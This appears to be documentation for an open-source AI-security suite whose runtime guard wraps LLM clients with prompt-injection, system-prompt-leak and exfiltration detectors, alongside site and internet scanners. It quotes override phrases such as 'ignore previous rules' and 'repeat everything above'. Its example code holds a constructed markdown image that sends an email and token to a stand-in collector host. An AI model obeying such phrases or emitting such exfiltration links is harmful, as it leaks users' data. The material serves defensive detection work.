Docs · the whole suite, end to end

Five products. One principle: only flag what's confirmable.

Lictor is an AI-security suite that meets your app at every layer it can be watched honestly: at runtime while the model is answering, in the browser against a live deployment, over time on a dashboard, across the internet as a continuous scanner, and in your editor as a local audit. Same rule everywhere: observe, confirm, then report. Nothing attacks a live system; nothing leaves your machine unless you choose to publish it.

Apache 2.0 · no telemetry · github.com/Raffa-jarrl/Lictor-AI


The map

Where each product sits

Pick by where the risk lives. The first three guard your app; Patrol is the internet-scale scanner pillar behind the in-the-wild disclosures; the CLI is the pre-release audit you run before you ship.

@lictor/sentinel

Runtime guard. Wraps your OpenAI / Anthropic SDK and checks every prompt in and every answer out. (npm + pip)

Lictor Shield

Browser extension. Audits a deployed site live, observe-only, one request a second. (Rust → WASM)

Lictor Guardian

Hosted dashboard and incident timeline. Aggregates findings over time. (free 90-day preview)

Lictor Patrol

Continuous internet-scale scanner. Passive recon plus a precision-gated active tier. (verify-gated)

CLI / skill suite

The 48-check pre-release audit, plus explain, fix-it and rotate. (100% local)

Product 1 · runtime guard · @lictor/sentinel (npm) · lictor-sentinel (pip)

A guard that rides along with every model call

Sentinel wraps your existing OpenAI or Anthropic client with a recursive Proxy, so it sees calls at any depth (client.chat.completions.create, client.messages.create, and nested helpers) without you rewriting a line of your own logic. Before a request leaves, it runs pre-flight checks on the input text. After the model answers, it runs post-flight checks on the output. Seven detectors total, the same seven in both the npm and pip builds, so a Node service and a Python worker behave identically.

Install is one line: you wrap() the client and keep using it as before. Apache 2.0, and no telemetry: nothing about your prompts or completions is sent anywhere.
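
The recursive-Proxy wrapping described above, as an added example that is not the @lictor/sentinel source: guard, GuardBlocked, the two sample detectors, the canary string and the fake client are hypothetical names constructed for illustration.

```javascript
// Added example, not the @lictor/sentinel source. Every name here is hypothetical.
class GuardBlocked extends Error {
  constructor(detector, callPath) {
    super(`${detector} blocked ${callPath.join(".")}`);
    this.detector = detector;
  }
}

const textOf = (value) => JSON.stringify(value) ?? ""; // stringify(undefined) is undefined
function runChecks(detectors, text, callPath) {
  for (const d of detectors) {
    if (d.test(text)) throw new GuardBlocked(d.name, callPath);
  }
}

// Objects are re-wrapped on each property access, so calls at any depth are seen.
function guard(target, checks, path = []) {
  return new Proxy(target, {
    get(obj, prop) {
      const value = obj[prop];
      if (typeof prop === "symbol") return value;
      const here = [...path, prop];
      if (typeof value === "function") {
        return (...args) => {
          runChecks(checks.preFlight, textOf(args), here); // before the call leaves
          const post = (out) => {
            runChecks(checks.postFlight, textOf(out), here); // before the caller sees it
            return out;
          };
          const result = value.apply(obj, args); // keep the SDK's own `this`
          // Promise results are checked when they resolve, sync results at once.
          return result && typeof result.then === "function" ? result.then(post) : post(result);
        };
      }
      return value !== null && typeof value === "object" ? guard(value, checks, here) : value;
    },
  });
}

// Constructed detectors and a constructed stand-in for an SDK client.
const CANARY = "CANARY-7f3a"; // marker assumed to be planted in the system prompt
const demoChecks = {
  preFlight: [{ name: "secrets-in-input", test: (t) => /\bsk-[A-Za-z0-9]{20,}\b/.test(t) }],
  postFlight: [{ name: "system-prompt-leak", test: (t) => t.includes(CANARY) }],
};
const fakeClient = {
  chat: { completions: { create: (req) => ({ content: req.leak ? `${CANARY} be nice` : "hello" }) } },
};
const guarded = guard(fakeClient, demoChecks);
```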

Pre-flight detectors · run on the input

PRE-FLIGHT

prompt-injection

Catches a user trying to override your instructions ("ignore previous rules", role-swap, jailbreak framing) before it reaches the model.

PRE-FLIGHT

indirect-prompt-injection

The same attack hidden inside content your app pulled in (a RAG document, a fetched page, an email) carrying instructions into the prompt second-hand.

PRE-FLIGHT

secrets-in-input

Flags an API key, token or credential that's about to be shipped off to the model provider in the prompt, a leak you'd never see in your logs.

Post-flight detectors · run on the output

POST-FLIGHT

pii-leak

Catches the model handing back personal data (emails, phone numbers, IDs) in an answer that shouldn't contain it.

POST-FLIGHT

system-prompt-leak

Catches the model reciting your system prompt back to the user: the classic "repeat everything above" exfiltration.

POST-FLIGHT

output-exfil-sink

Catches model output that's trying to smuggle data out: a markdown image or link pointed at an attacker URL with your data in the query string.

OPT-IN

slopsquat-watch

Informational only. Notices when the model suggests a package name that doesn't exist, the seed of a slopsquatting attack. Off the blocking path by default; it never blocks unless you ask it to.
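
What an output-exfil-sink check can look like, as an added example that is not Lictor's detector: findExfilSinks, the allowlist, the SELF origin, the MIN_PAYLOAD threshold, the severity labels and the sample outputs are assumptions constructed for illustration.

```javascript
// Added example of the output-exfil-sink idea; not Lictor's detector.
// SELF, ALLOWED_HOSTS, MIN_PAYLOAD and the severity labels are assumptions.
const SELF = "https://app.example.com/"; // origin the chat UI is assumed to run on
const ALLOWED_HOSTS = new Set(["app.example.com", "docs.example.com"]);
const MIN_PAYLOAD = 16; // decoded query characters before a URL counts as carrying data

// Markdown images ![alt](url) and links [text](url); group 1 is "!" for images.
const MD_TARGET = /(!?)\[[^\]]*\]\(\s*<?([^)\s>]+)>?[^)]*\)/g;

function findExfilSinks(output, secrets = [], allowedHosts = ALLOWED_HOSTS) {
  const findings = [];
  for (const [, bang, raw] of output.matchAll(MD_TARGET)) {
    let url;
    try {
      url = new URL(raw, SELF); // resolves relative and protocol-relative targets
    } catch {
      continue; // unparseable target: nothing a renderer could fetch
    }
    if (!/^https?:$/.test(url.protocol) || allowedHosts.has(url.hostname)) continue;
    // searchParams values are already percent-decoded.
    const payload = [...url.searchParams.values()].join(" ");
    const knownSecret = secrets.some((s) => payload.includes(s));
    if (!knownSecret && payload.length < MIN_PAYLOAD) continue;
    findings.push({
      kind: bang ? "image" : "link",
      host: url.hostname,
      // Images load as soon as the answer renders; links need a click.
      severity: bang || knownSecret ? "high" : "medium",
    });
  }
  return findings;
}

// Constructed model outputs.
const BENIGN = "See [the docs](https://docs.example.com/guide?page=2) and ![logo](/static/logo.png).";
const SMUGGLE = "![x](https://collector.invalid/p.png?d=user%40corp.example%20token%3Dabc123abc123)";
const SHORT_QUERY = "[search](https://search.example.org/?q=cats)";
```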

Install · one line, then nothing changes

# Node, npm
npm install @lictor/sentinel

// then wrap your client once
import OpenAI from "openai";
import { wrap } from "@lictor/sentinel";

const client = wrap(new OpenAI());
// use `client` exactly as before; pre/post-flight checks run on every call

# Python, pip
pip install lictor-sentinel

# then wrap your client once
from anthropic import Anthropic
from lictor_sentinel import wrap

client = wrap(Anthropic())
# use `client` exactly as before; same 7 detectors as the npm build

Want to see what each detector maps to in the standards? The prompt-injection, output-handling and exfiltration detectors line up with the OWASP Top 10 for LLM apps in the coverage map.

Product 2 · browser extension · Lictor Shield

Audit the site you're actually looking at

Shield runs 10 checks against a deployed site: the real thing on the real domain, not your source tree. It is observe-only: it reads what the browser already has and makes a small number of plain requests, single-lane at one request per second per host, always with credentials: omit so it never rides your logged-in session. The pattern-matching is done by a Rust core compiled to WASM, so the heavy scanning happens locally in the page, fast, with no server round-trip.

The 10 live checks

CRITICAL

Secrets in HTML & JS

Key-shaped strings the live page ships in its markup or bundled scripts.

HIGH

AI-agent fingerprint

Detects when the site is fronted by an AI agent or assistant, the surface our runtime detectors guard.

CRITICAL

Exposed .env / .git

Config and version-control directories the deployment accidentally serves.

CRITICAL

Supabase / Firebase open

A backend reachable from the page with no security rules in front of it.

HIGH

Unauth API paths

API endpoints the front-end calls that answer without a login check.

HIGH

Admin paths

Admin or dashboard surfaces left reachable on the public deployment.

HIGH

CORS

Cross-origin settings permissive enough to let another site read responses.

MEDIUM

Security headers

Missing CSP / HSTS / nosniff and the headers a framework leaves off.

MEDIUM

Mixed content

HTTPS pages pulling assets over plain HTTP, a downgrade and tamper risk.

MEDIUM

Exposed source maps

Published .map files that hand an attacker your original source.

Shield holds itself to the same evidence bar as the audit. See the false positives we filter for why a bare 200 OK is never enough to call something exposed.
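
The request discipline and evidence bar described for Shield (one request per second per host, credentials omitted, no finding on a bare 200 OK), as an added example that is not Shield's code: nextSlot, classify, the verdict labels and the two evidence rules are assumptions made for illustration.

```javascript
// Added example; not Lictor Shield's code. The evidence rules are assumptions.
const REQUEST_INIT = { method: "GET", credentials: "omit" }; // never ride a logged-in session

// Single lane per host: returns the earliest time (ms) the next request may be sent.
const lastSent = new Map();
function nextSlot(host, nowMs, gapMs = 1000) {
  const at = Math.max(nowMs, (lastSent.get(host) ?? -Infinity) + gapMs);
  lastSent.set(host, at);
  return at;
}

const looksLikeHtml = (body) => /^\s*<(!doctype|html|head|body)\b/i.test(body);

// A 200 alone proves nothing: SPA fallbacks answer 200 + index.html for any path.
// Each rule asks for content only the real file would have.
const EVIDENCE = new Map([
  // .git/HEAD holds a symbolic ref or a detached 40-hex commit id.
  ["/.git/HEAD", (body) => /^(ref: refs\/\S+|[0-9a-f]{40})\s*$/.test(body)],
  // .env: at least two KEY=value lines.
  ["/.env", (body) => body.split(/\r?\n/).filter((l) => /^[A-Z][A-Z0-9_]*=/.test(l)).length >= 2],
]);

function classify(path, res) {
  if (res.status !== 200) return "not-exposed";
  const proof = EVIDENCE.get(path);
  if (!proof || looksLikeHtml(res.body)) return "not-exposed";
  return proof(res.body) ? "confirmed" : "unconfirmed";
}
```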

Product 3 · hosted dashboard · Lictor Guardian

The findings, gathered over time

Sentinel and Shield each tell you about a moment. Guardian is the place those moments add up. It's a hosted dashboard and incident timeline that aggregates findings over time, so you can see whether a problem is new, recurring, or finally resolved, and tell that story to the people who ask. Free as a 90-day preview.

Incident timeline

Findings laid out in order: when each first appeared, when it changed, when it cleared.

Aggregated over time

One view across runs and sources, so a recurring issue reads as a pattern, not a surprise.

Free 90-day preview

Try the whole timeline for 90 days at no cost while the dashboard is in preview.

Product 4 · continuous scanner pillar · Lictor Patrol

The engine behind the in-the-wild disclosures

Patrol is the internet-scale scanner pillar. It starts with passive recon (what's already public, gathered without touching the target) and adds a precision-gated active tier that confirms a narrow set of high-signal exposures. Every finding, passive or active, passes through a central verify gate before it is ever reported. Until a human confirms it, a finding is SUSPECTED, never asserted. Disclosure is ethical and observe-only: Patrol looks, it does not break in.

The precision-gated active tier

These are the exposures the active tier confirms: each one observable from the outside, none requiring an attack.

CRITICAL

Exposed configs

Config files a deployment serves to the open internet.

CRITICAL

Open buckets

World-readable object storage with contents anyone can list.

HIGH

CORS

Cross-origin policies loose enough to leak authenticated responses.

HIGH

Subdomain takeovers

Dangling DNS pointed at a service that can be claimed.

CRITICAL

Leaked keys

Live credentials exposed in public surfaces, confirmed before report.

VERIFY GATE

SUSPECTED until verified

Nothing is reported as fact until a human clears the central verify gate.

The verify gate exists for the same reason as the audit's guards. See how Patrol decides "reachable" is not "exploitable".

Product 5 · local audit · the CLI / skill suite

The pre-release audit, in your editor

Four slash commands, all 100% local: no token, no signup, no telemetry. They read your code and explain what they find in plain English. The headline command is the 48-check audit documented in full on the coverage page.

/lictor-security-check

The 48-check pre-release audit. Detects the stack, runs every applicable check, writes a plain-English SECURITY-AUDIT.md.

/lictor-explain

Takes any finding or jargon-heavy warning and rewrites it as something a non-technical founder can act on.

/lictor-fix-it

Walks the findings one at a time, shows the proposed change, and applies it only with your explicit OK.

/lictor-rotate

Step-by-step, provider-specific rotation of a leaked key: the exact URL, the exact button, and how to confirm it worked.

Usage

# run the full 48-check audit on the current project
/lictor-security-check

# confused by a finding? get it in plain English
/lictor-explain

# apply the fixes, one at a time, with your approval
/lictor-fix-it

# a key leaked? rotate it, provider by provider
/lictor-rotate

Full check list with OWASP / CWE mappings: the 48 checks →

Honest boundaries

One rule across all five

Every product only reports what it can confirm by reading code or observing what's already public, never by attacking a live system. Sentinel guards calls without touching your prompts' contents off-box; Shield stays single-lane and credential-less; Patrol holds findings at SUSPECTED until a human verifies them; the CLI runs entirely on your machine. A scanner that cries wolf is worse than none, so the same evidence bar runs through all of it. Here are the false positives we filter.

Open-source. Apache 2.0. No telemetry.

Read the code before you trust it, install only the pieces you need, and run the audit on your own machine. Start with the 48-check audit, or wrap your model client today.
